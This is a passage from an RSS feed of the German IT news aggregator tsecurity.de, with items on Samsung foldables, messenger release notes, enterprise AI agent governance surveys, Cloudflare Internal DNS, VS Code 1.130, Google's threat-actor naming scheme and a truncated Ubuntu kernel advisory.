<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/06/14/whatsapp-zwei-accounts-nutzen-iphone/">WhatsApp: So kannst du zwei Accounts gleichzeitig auf dem iPhone nutzen</a> erschien zuerst auf <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Folge uns auch auf <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV0poYzJsamRHaHBibXRwYm1jdVpHVXZZbXh2WnlnQVAB" target="_blank">Google News</a> und <a href="https://flipboard.com/@BASICthinking" target="_blank">Flipboard</a> oder abonniere <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung Galaxy Z Flip 8 und Fold 8 (Ultra): Bei Vodafone bekommt ihr garantiert 500 Euro für euer altes Smartphone]]></title>
<description><![CDATA[Samsung bringt mit dem Galaxy Z Flip 8, Galaxy Z Fold 8 und Galaxy Z Fold 8 Ultra seine neue Foldable-Generation auf den Markt. Parallel dazu hat Vodafone den offiziellen Vorverkauf gestartet.]]></description>
<link>https://tsecurity.de/de/3693075/it-nachrichten/samsung-galaxy-z-flip-8-und-fold-8-ultra-bei-vodafone-bekommt-ihr-garantiert-500-euro-fuer-euer-altes-smartphone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693075/it-nachrichten/samsung-galaxy-z-flip-8-und-fold-8-ultra-bei-vodafone-bekommt-ihr-garantiert-500-euro-fuer-euer-altes-smartphone/</guid>
<pubDate>Sat, 25 Jul 2026 06:06:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Samsung bringt mit dem Galaxy Z Flip 8, Galaxy Z Fold 8 und Galaxy Z Fold 8 Ultra seine neue Foldable-Generation auf den Markt. Parallel dazu hat Vodafone den offiziellen Vorverkauf gestartet.]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.17.0-beta.1]]></title>
<description><![CDATA[Group admins can now delete recently sent messages in a group chat. If someone accidentally posts a spoiler in your Book Club group and then walks away from their phone, a group admin can delete it to keep the plot twist intact. You can easily see when a message was deleted and who removed it, ju...]]></description>
<link>https://tsecurity.de/de/3693058/downloads/v8170-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693058/downloads/v8170-beta1/</guid>
<pubDate>Sat, 25 Jul 2026 05:15:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Group admins can now delete recently sent messages in a group chat. If someone accidentally posts a spoiler in your Book Club group and then walks away from their phone, a group admin can delete it to keep the plot twist intact. You can easily see when a message was deleted and who removed it, just like the existing "Delete for Everyone" feature.</li>
<li>We also increased the maximum number of pinned chats from 4 to 10, so you can show 6 more people how much you love what they have to say.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.17.0]]></title>
<description><![CDATA[Group admins can now delete recently sent messages in a group chat. If someone accidentally posts a spoiler in your Book Club group and then walks away from their phone, a group admin can delete it to keep the plot twist intact. You can easily see when a message was deleted and who removed it, ju...]]></description>
<link>https://tsecurity.de/de/3693057/downloads/v8170/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693057/downloads/v8170/</guid>
<pubDate>Sat, 25 Jul 2026 05:15:18 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Group admins can now delete recently sent messages in a group chat. If someone accidentally posts a spoiler in your Book Club group and then walks away from their phone, a group admin can delete it to keep the plot twist intact. You can easily see when a message was deleted and who removed it, just like the existing "Delete for Everyone" feature.</li>
<li>We also increased the maximum number of pinned chats from 4 to 10, so you can show 6 more people how much you love what they have to say.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.18.0-beta.1]]></title>
<description><![CDATA[Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.]]></description>
<link>https://tsecurity.de/de/3693056/downloads/v8180-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693056/downloads/v8180-beta1/</guid>
<pubDate>Sat, 25 Jul 2026 05:15:17 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.18.0]]></title>
<description><![CDATA[Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.]]></description>
<link>https://tsecurity.de/de/3693053/downloads/v8180/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693053/downloads/v8180/</guid>
<pubDate>Sat, 25 Jul 2026 05:15:05 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.19.0-beta.1]]></title>
<description><![CDATA[Group admins can now bring chats to their natural conclusion with the new "End Group" option in group settings. Ending a group prevents group members from sending messages or starting calls, and also disables invites. Now you can make sure everyone stays on the right thread by ending last year's ...]]></description>
<link>https://tsecurity.de/de/3693052/downloads/v8190-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693052/downloads/v8190-beta1/</guid>
<pubDate>Sat, 25 Jul 2026 05:15:04 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Group admins can now bring chats to their natural conclusion with the new "End Group" option in group settings. Ending a group prevents group members from sending messages or starting calls, and also disables invites. Now you can make sure everyone stays on the right thread by ending last year's sewing meetup group before stitching a new one together.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.19.0]]></title>
<description><![CDATA[Group admins can now bring chats to their natural conclusion with the new "End Group" option in group settings. Ending a group prevents group members from sending messages or starting calls, and also disables invites. Now you can make sure everyone stays on the right thread by ending last year's ...]]></description>
<link>https://tsecurity.de/de/3693051/downloads/v8190/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693051/downloads/v8190/</guid>
<pubDate>Sat, 25 Jul 2026 05:14:56 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Group admins can now bring chats to their natural conclusion with the new "End Group" option in group settings. Ending a group prevents group members from sending messages or starting calls, and also disables invites. Now you can make sure everyone stays on the right thread by ending last year's sewing meetup group before stitching a new one together.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[VentureBeat Research: Where enterprise AI agent governance hasn't caught up]]></title>
<description><![CDATA[Enterprises deployed AI agents ahead of the controls needed to manage them — and they did it knowingly. That is the central finding across the five parallel surveys VentureBeat Research fielded in June, spanning every layer of the agentic stack. Now those enterprises are retrofitting to catch up ...]]></description>
<link>https://tsecurity.de/de/3692498/it-nachrichten/venturebeat-research-where-enterprise-ai-agent-governance-hasnt-caught-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692498/it-nachrichten/venturebeat-research-where-enterprise-ai-agent-governance-hasnt-caught-up/</guid>
<pubDate>Fri, 24 Jul 2026 22:51:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprises deployed AI agents ahead of the controls needed to manage them — and they did it knowingly. That is the central finding across the five parallel surveys VentureBeat Research fielded in June, spanning every layer of the agentic stack. Now those enterprises are retrofitting to catch up with their own standards, and they are budgeting for it: In each of the five control layers we measured, 57 to 68% of enterprises plan to switch vendors or add new ones within 12 months, and roughly a third, depending on the layer, plan to move within the quarter.</p><p><a href="https://venturebeat.com/category/resources">VentureBeat Research</a> measured the five controls an enterprise has to build before it can trust an agent: identity, evaluation, cost telemetry, the context layer, and orchestration. Identity governs which agent is allowed to do what, under whose credentials. Evaluation determines whether the agent's work is any good. Cost telemetry tracks what each agent costs to run. The context layer supplies the business data and definitions agents draw on when they answer. And the orchestration control plane coordinates multi-step agent work. Each of our five reports measures one of those controls.</p><p><b>Most deployed "agents" are chatbots wearing the label.</b> Seventy-one percent of enterprises said a quarter or fewer of their deployed "agents" can complete multi-step work on their own; only 10% said true agents are the majority of what they run. These respondents are positioned to know: 81% recommend or decide AI purchases at their companies. A single-prompt chatbot with a human reading every answer needs none of the controls the other four reports measure. A true multi-step agent needs all of them — and most enterprises can't say which one they've deployed. <i>(Full findings: </i><a href="https://venturebeat.com/resources/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents"><i>Agentic Orchestration report.</i></a><i>)</i></p><p><b>Autonomy is outrunning trust in the evaluations that gate it.</b> Two-thirds of enterprises either already allow an agent to push a code or system change to production on automated evaluation results alone, with no human review, or are actively engineering toward that within 12 months. Only 5% fully trust the evaluations that would make that call — and half of enterprises shipped an agent that passed internal evaluations and then caused a customer-facing failure in the past year. Before removing human review from any workflow, test evaluations against production outcomes rather than internal benchmarks. <i>(Full findings: </i><a href="https://venturebeat.com/resources/the-agent-evaluation-gap-enterprise-ai-organizations-have-a-reality-alignment-problem-not-a-coverage-problem-and-most-are-shipping-to-production-anyway"><i>Agent Reliability &amp; Evals report</i></a><i>.)</i></p><p><b>Companies that let agents share credentials get hit more often.</b> Sixty-nine percent of companies let at least some of their agents share credentials — multiple agents operating under one API key or service account. Organizations that allow credential sharing anywhere experienced a security incident or near-miss at a 63.5% rate (47 of 74), against 40.9% (nine of 22) at companies where every agent has its own scoped identity. The fix is scoped identity for every agent, starting with the ones that touch production systems. <i>(Full findings: </i><a href="https://venturebeat.com/resources/the-agent-security-gap-54-of-enterprises-have-already-had-an-ai-agent-incident-and-most-still-let-agents-share-credentials"><i>Agentic Security &amp; Identity report</i></a><i>.)</i></p><p><b>The most expensive hardware in the building runs at half capacity or less.</b> More than eight in 10 enterprises that run their own GPUs reported utilization of 50% or less, and only 44% rigorously track what their AI compute actually costs and returns. The number worth chasing first isn't more GPUs — it's the utilization and per-workload cost of the ones already running. <i>(Full findings: </i><a href="https://venturebeat.com/resources/the-ai-compute-gap-enterprises-are-buying-infrastructure-faster-than-they-can-measure-what-it-costs"><i>AI Infrastructure &amp; Compute report</i></a><i>.)</i></p><p><b>Agents answer confidently from data nobody governs.</b> Fifty-seven percent of enterprises traced a confident, wrong agent answer in the past six months to their own missing or inconsistent business context — wrong metrics, stale definitions, absent documents — and most saw it happen more than once. Governing the definitions agents answer from — metrics and entities first — has to come before scaling the agents that depend on them. <i>(Full findings: </i><a href="https://venturebeat.com/resources/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix"><i>Context Layers / RAG report</i></a><i>.)</i></p><p>No layer has an entrenched incumbent: The defaults today are the built-in tools that ship with the big AI platforms enterprises already use. Switching intent runs highest in orchestration itself, where 68% plan to adopt, add, or replace platforms within 12 months and 34% within the quarter. Our surveys did not ask which direction that money moves — toward the platforms' built-in tools or toward the specialists challenging them — and that open question is the next four quarters of this market.</p><hr><p><b>About this research</b> </p><p><a href="https://venturebeat.com/category/resources">VentureBeat Research</a> fielded five parallel surveys in June 2026 under its VB Pulse program: Agentic Orchestration (101 respondents), Agent Reliability &amp; Evals (157), Agentic Security &amp; Identity (107), AI Infrastructure &amp; Compute (107), and Context Layers / RAG (101) — 573 qualified respondents in total, all at organizations with 100 or more employees. Samples are self-selected, and some findings should be read directionally; each report carries its full methodology note. What the pattern supports more strongly than any single percentage is the direction: every survey, independently, points the same way. VentureBeat produces both this research and <a href="https://venturebeat.com/vbtransform2026">VB Transform</a>, the conference where these reports debuted.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare Internal DNS puts public and private DNS on one policy engine]]></title>
<description><![CDATA[Enterprises typically operate separate systems for internal and external DNS because the two serve different audiences. Public DNS resolves names for services meant to be reached from the internet. Private DNS resolves internal resources, such as databases and internal applications, that should n...]]></description>
<link>https://tsecurity.de/de/3692009/it-security-nachrichten/cloudflare-internal-dns-puts-public-and-private-dns-on-one-policy-engine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692009/it-security-nachrichten/cloudflare-internal-dns-puts-public-and-private-dns-on-one-policy-engine/</guid>
<pubDate>Fri, 24 Jul 2026 18:18:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Enterprises typically operate separate systems for internal and external <a href="https://www.networkworld.com/article/965540/what-is-dns-and-how-does-it-work.html">DNS</a> because the two serve different audiences. Public DNS resolves names for services meant to be reached from the internet. Private DNS resolves internal resources, such as databases and internal applications, that should never be visible outside the corporate network. </p>



<p class="wp-block-paragraph">While public DNS is usually a single system, private DNS is often scattered across on-premises appliances, cloud-native resolvers, and split-horizon setups, where the same hostname resolves to a different answer depending on whether the query comes from inside or outside the network. Coordinating those deployments across headquarters, branch offices, and multiple clouds means <a href="https://www.networkworld.com/article/4158134/dns-security-is-often-inadequate-and-network-engineers-should-get-more-involved.html">ongoing manual synchronization work</a> for network teams. </p>



<p class="wp-block-paragraph">Private DNS itself is not a new concept. It is already available from hyperscalers and established enterprise DNS vendors, but it typically runs apart from public DNS, with its own console, control plane and policy engine.</p>



<p class="wp-block-paragraph">Cloudflare’s answer is a product it calls Internal DNS.</p>



<p class="wp-block-paragraph">“Many organizations already use Cloudflare for their public DNS,” <a href="https://www.linkedin.com/in/enriquesomoza/">Enrique Somoza</a>, product, performance and infrastructure at Cloudflare, told<em> Network World</em>. “Internal DNS extends that same platform to private DNS, so public and private are managed from the same global network and control plane.” </p>



<h2 class="wp-block-heading">How it works</h2>



<p class="wp-block-paragraph">Query handling starts at the resolver, not at the zone. That consolidation extends to daily operations as well.</p>



<p class="wp-block-paragraph">“Instead of operating two separate DNS systems, customers use one API, one audit trail, one dashboard, and one policy engine for every DNS query—whether it is for a public website or an internal application,” Somoza said.</p>



<p class="wp-block-paragraph"><strong>Policy first.</strong> The resolver sits ahead of every lookup, not behind it. “Architecturally, Cloudflare Gateway becomes the resolver that customers connect to, and can use WARP, DNS over HTTPS, DNS over TLS, or traditional DNS,” Somoza said. “Gateway evaluates zero -trust policies first, then routes the query to the appropriate DNS view based on context, such as source IP, device posture, or network location.”</p>



<p class="wp-block-paragraph"><strong>No public path in.</strong> Internal zones sit outside the public DNS hierarchy entirely. “Internal zones are never assigned public nameservers—they are only reachable through Gateway, so every query is evaluated before it is resolved,” Somoza said.</p>



<p class="wp-block-paragraph"><strong>One hostname, multiple answers.</strong> Branch offices, data centers and cloud environments no longer each need their own resolver stack. “Operationally, this simplifies environments that span branch offices, data centers, and multiple clouds,” Somoza said. “The same internal hostname can return different answers depending on where the request originated without maintaining separate resolver infrastructure, conditional forwarders, or duplicate zone files.”</p>



<p class="wp-block-paragraph">Somoza described the underlying objective in direct terms: “The goal is to make internal DNS behave like a single service instead of a collection of independent deployments,” he said.</p>



<p class="wp-block-paragraph"><strong>View selection.</strong> The same hostname can resolve to different IP addresses depending on where the request comes from. Gateway makes that call using several client signals. </p>



<p class="wp-block-paragraph">“View selection is policy driven,” Somoza said. “Gateway resolver policies evaluate the context of each DNS query, including attributes like source IP, device identity, or network location and determine which DNS view should answer the request.”</p>



<p class="wp-block-paragraph">A view is a container, not a separate infrastructure stack. Somoza explained that a view is simply a logical grouping of internal zones. For example, a company could have separate views for Europe and North America, or for corporate users and operational technology networks.</p>



<p class="wp-block-paragraph"><strong>Latency and resilience.</strong> Internal DNS inherits its performance characteristics from Cloudflare’s existing public network. “Internal DNS runs on Cloudflare’s global network, so queries are answered by the nearest available Gateway location, helping keep latency low for connected users,” Somoza said. “Because Internal DNS runs on the same global infrastructure as Cloudflare’s public DNS, it benefits from the same anycast architecture, geographic distribution, and resilient network design.”</p>



<h2 class="wp-block-heading">How this differs from split-horizon DNS</h2>



<p class="wp-block-paragraph">Internal DNS replaces the duplicate-zone model traditional split-horizon setups depend on.</p>



<p class="wp-block-paragraph">“Before migrating, many organizations maintain multiple versions of the same internal DNS zones across headquarters, branch offices, and cloud environments,” Somoza explained. “Conditional forwarders determine which resolver answers each query, and keeping those environments synchronized becomes an ongoing operational task.”</p>



<p class="wp-block-paragraph">Internal DNS collapses those duplicate zones into a single authoritative copy split across views instead. “With Internal DNS, that configuration becomes much simpler,” Somoza said. “A customer might create a single corp.internal zone in Cloudflare and define multiple DNS views.”</p>



<p class="wp-block-paragraph">For example, users in headquarters could receive one internal IP address for wiki.corp.internal, while branch offices receive a different address. Somoza emphasized that the zone itself only exists once. “Instead of maintaining multiple copies of the same configuration, administrators manage a single source of truth,” he said.</p>



<h2 class="wp-block-heading">Early use cases and migration challenges</h2>



<p class="wp-block-paragraph">Not surprisingly, Somoza noted that the first use case Cloudflare sees for Internal DNS is for split-horizon DNS consolidation. There is also interest from organizations that operate across multiple cloud providers that want one consistent internal DNS service instead of managing separate DNS platforms in each environment.</p>



<p class="wp-block-paragraph">Another common use case is extending zero-trust policies to internal name resolution. “Customers already use Gateway to control access to internet traffic, and Internal DNS lets them apply similar policy decisions before internal names are resolved,” Somoza said.</p>



<p class="wp-block-paragraph">When it comes to migration, the friction customers report during migration is procedural rather than architectural. </p>



<p class="wp-block-paragraph">“Customers need to think through API permissions, connectivity, and how existing local DNS forwarding rules interact with Gateway,” Somoza said. “Those are all well understood migration steps and customers often run both environments in parallel before completing the transition.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OneDrive: Microsoft stoppt Updates für Windows 10 ab August - ad-hoc-news.de]]></title>
<description><![CDATA[Parallel endet am 13. Oktober 2026 der Mainstream-Support für Windows Server 2022 und Windows 11 Version 24H2 (Home und Pro). Anzeige. Während ...]]></description>
<link>https://tsecurity.de/de/3691923/windows-server/onedrive-microsoft-stoppt-updates-fuer-windows-10-ab-august-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691923/windows-server/onedrive-microsoft-stoppt-updates-fuer-windows-10-ab-august-ad-hoc-newsde/</guid>
<pubDate>Fri, 24 Jul 2026 17:46:36 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Parallel endet am 13. Oktober 2026 der Mainstream-Support für <b>Windows Server</b> 2022 und Windows 11 Version 24H2 (Home und Pro). Anzeige. Während ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Visual Studio Code 1.130 dresses up Agents window]]></title>
<description><![CDATA[Microsoft has released Visual Studio Code 1.130, an update to the code editor that brings several improvements to the Agents window, along with enhancements to the agent host and the terminal.



VS Code 1.130 was released on July 22, one week after VS Code 1.129. Developers can access the releas...]]></description>
<link>https://tsecurity.de/de/3691858/ai-nachrichten/visual-studio-code-1130-dresses-up-agents-window/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691858/ai-nachrichten/visual-studio-code-1130-dresses-up-agents-window/</guid>
<pubDate>Fri, 24 Jul 2026 17:00:02 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft has released Visual Studio Code 1.130, an update to the code editor that brings several improvements to the Agents window, along with enhancements to the agent host and the terminal.</p>



<p class="wp-block-paragraph">VS Code 1.130 was released on <a href="https://code.visualstudio.com/updates/v1_130#_agents-window-improvements-preview">July 22</a>, one week after <a href="https://www.infoworld.com/article/4199680/visual-studio-code-1-129-introduces-dedicated-agent-host.html">VS Code 1.129</a>. Developers can access the release for Windows, Linux, or Mac from <a href="https://code.visualstudio.com/Download?_exp_download=fb315fc982">code.visualstudio.com</a>. </p>



<p class="wp-block-paragraph">With the new release, the <a href="https://code.visualstudio.com/docs/agents/agents-window">Agents window</a> gets updates that make it easier to review changes and manage chats. File-level diff statistics help users assess the size of each file’s changes when scanning a multi-file diff. The window also gets a more compact multi-file diff that makes it easier to review changes, Microsoft said. The Agents window is a dedicated window in VS Code that lets users run and track multiple agent sessions in parallel across their projects, without opening each workspace in a separate window.</p>



<p class="wp-block-paragraph">Also with VS Code 1.130, assisted permissions for agent tool calls are available in the <a href="https://code.visualstudio.com/updates/v1_130#_the-agent-host" data-type="link" data-id="https://code.visualstudio.com/updates/v1_130#_the-agent-host">agent host</a>. With assisted permissions, the LLM evaluates the risk of each tool call and decides whether the tool can run or should require the user’s approval. The setting to enable assisted permissions is <code>chat.assistedPermissions.enabled</code>. In another agent host improvement, quick chats running on the agent host now use compact, single-line rows in the sessions list. Regular sessions retain a second line with change statistics, status, and timestamps. </p>



<p class="wp-block-paragraph">VS Code users now can open file links from Git diff output in the terminal when Git’s <a href="https://git-scm.com/docs/diff-config#Documentation/diff-config.txt-diffmnemonicPrefix" target="_blank" rel="noreferrer noopener"><code>diff.mnemonicPrefix</code></a> option is enabled. VS Code recognizes prefixes such as<code> i/</code> for the index and <code>w/</code> for the working tree, and removes the prefix from the link target so the correct file opens. When mnemonic prefixes are enabled, VS Code also recognizes the numeric prefixes produced by <code>git diff --no-index</code>.</p>



<p class="wp-block-paragraph">Timestamps for chat requests and responses now are displayed when users hover over the message toolbar. You can disable this through the <code>chat.verbose</code> setting. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Updated Cyber Threat Actor Naming System]]></title>
<description><![CDATA[Introduction 
Today, Google Threat Intelligence Group (GTIG) will begin rolling out a unified naming schema for tracking threat actors. This new naming taxonomy represents an effort to standardize tracking across platforms and public reporting.
Why are we Adopting a Different Naming System?
Histo...]]></description>
<link>https://tsecurity.de/de/3691731/it-security-nachrichten/updated-cyber-threat-actor-naming-system/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691731/it-security-nachrichten/updated-cyber-threat-actor-naming-system/</guid>
<pubDate>Fri, 24 Jul 2026 16:04:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><h2><strong>Introduction </strong></h2>
<p><span>Today, Google Threat Intelligence Group (GTIG) will begin rolling out a unified naming schema for tracking threat actors. This new naming taxonomy represents an effort to standardize tracking across platforms and public reporting.</span></p>
<h2><strong>Why are we Adopting a Different Naming System?</strong></h2>
<p><span>Historically, Mandiant and Google’s Threat Analysis Group (TAG) maintained distinct tracking systems, relying on parallel naming schemas that grew independently over time. The creation of GTIG has necessitated a new, fused tracking system, and a new naming system. Thinking to the future, GTIG’s new system will rely on cryptonyms. Relying on sequential numbers or disparate identifiers (e.g. APT1) fails to provide defenders the critical context needed to operate quickly. Threat tracking shouldn’t be an exercise in memorization, but rather one of intuition. The new naming convention aligns with industry standard threat actor naming systems. </span></p>
<h2><strong>Our New Schema</strong></h2>
<p><span>Our new schema utilizes a cryptonym-based approach, employing memorable two-word combinations for each distinct threat actor:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The </span><strong>first word</strong><span> is a unique and memorable term chosen to represent the specific actor, particularly names that may have been used in prior public reporting. If no previously used term exists, this word is randomly generated to remove bias, then vetted by our analysts.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>The </span><strong>second word</strong><span> categorizes threat clusters by motivation, attribution, or activity type based on which category we consider to be most important for defense and response strategies.</span></p>
</li>
</ul>
<p><span>The table below provides a sample of how threat actor categories will map to the second word in each cryptonym:</span></p>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Origin or Type</strong></p>
</td>
<td>
<p><strong>Group Name</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>People’s Republic of China</span></p>
</td>
<td>
<p><span>CASTLE</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Iran</span></p>
</td>
<td>
<p><span>ION</span></p>
</td>
</tr>
<tr>
<td>
<p><span>North Korea</span></p>
</td>
<td>
<p><span>NEPTUNE</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Russia</span></p>
</td>
<td>
<p><span>RELIC</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Cybercriminal</span></p>
</td>
<td>
<p><span>COMET</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 1: Examples of Google’s new threat actor naming system categories</span></p>
<p><span>We know there are many threat actor tracking schemas in the industry, so we are intentionally seeking to keep this system as simple as possible to streamline operations and facilitate mapping to other naming taxonomies. However, a significant caveat remains: because no two organizations have the exact same visibility into the threat landscape, direct, apples-to-apples comparisons between threat actors are rarely possible. Transitioning to a convention that is simpler to follow and remember is a practical step toward managing a highly intricate tracking problem. </span></p>
<h2><strong>A Work in Progress</strong></h2>
<p><span>We have initially prioritized renaming several dozen of the most active groups, and will continue this process on a rolling basis. Previous names will remain indexed and searchable in the Google Threat Intelligence (GTI) platform, with MITRE ATT&amp;CK mappings and other vendor aliases preserved, see Figure 1. </span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image_22.max-1000x1000.png" alt="Updated Cyber Threat Actor Naming System Image 1">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="5g4yd">Figure 1: Threat actor name appearance in GTI platform on initial rollout</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>We will continue to use UNC, or “uncategorized” designations for threat clusters that are still in the early stages of investigation, as described </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/how-mandiant-tracks-uncategorized-threat-actors"><span>here</span></a><span>.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung Galaxy Z Flip 8 und Fold 8 (Ultra): Bei Vodafone bekommt ihr garantiert 500 Euro für euer altes Smartphone]]></title>
<description><![CDATA[Samsung bringt mit dem Galaxy Z Flip 8, Galaxy Z Fold 8 und Galaxy Z Fold 8 Ultra seine neue Foldable-Generation auf den Markt. Parallel dazu hat Vodafone den offiziellen Vorverkauf gestartet.]]></description>
<link>https://tsecurity.de/de/3691649/android-tipps/samsung-galaxy-z-flip-8-und-fold-8-ultra-bei-vodafone-bekommt-ihr-garantiert-500-euro-fuer-euer-altes-smartphone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691649/android-tipps/samsung-galaxy-z-flip-8-und-fold-8-ultra-bei-vodafone-bekommt-ihr-garantiert-500-euro-fuer-euer-altes-smartphone/</guid>
<pubDate>Fri, 24 Jul 2026 15:14:37 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Samsung bringt mit dem Galaxy Z Flip 8, Galaxy Z Fold 8 und Galaxy Z Fold 8 Ultra seine neue Foldable-Generation auf den Markt. Parallel dazu hat Vodafone den offiziellen Vorverkauf gestartet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie mit KI aus Daten Entscheidungen werden | Computer Weekly]]></title>
<description><![CDATA[Sicherheit, Zugriffsrichtlinien und Überprüfbarkeit müssen parallel zur Demokratisierung selbst skalieren. Wenn dies geschieht, ist das Ergebnis nicht ...]]></description>
<link>https://tsecurity.de/de/3691598/it-security-nachrichten/wie-mit-ki-aus-daten-entscheidungen-werden-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691598/it-security-nachrichten/wie-mit-ki-aus-daten-entscheidungen-werden-computer-weekly/</guid>
<pubDate>Fri, 24 Jul 2026 14:59:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Sicherheit</b>, Zugriffsrichtlinien und Überprüfbarkeit müssen parallel zur Demokratisierung selbst skalieren. Wenn dies geschieht, ist das Ergebnis nicht ...]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8595-2: Linux kernel (AWS) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691499/unix-server/usn-8595-2-linux-kernel-aws-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691499/unix-server/usn-8595-2-linux-kernel-aws-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:43 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
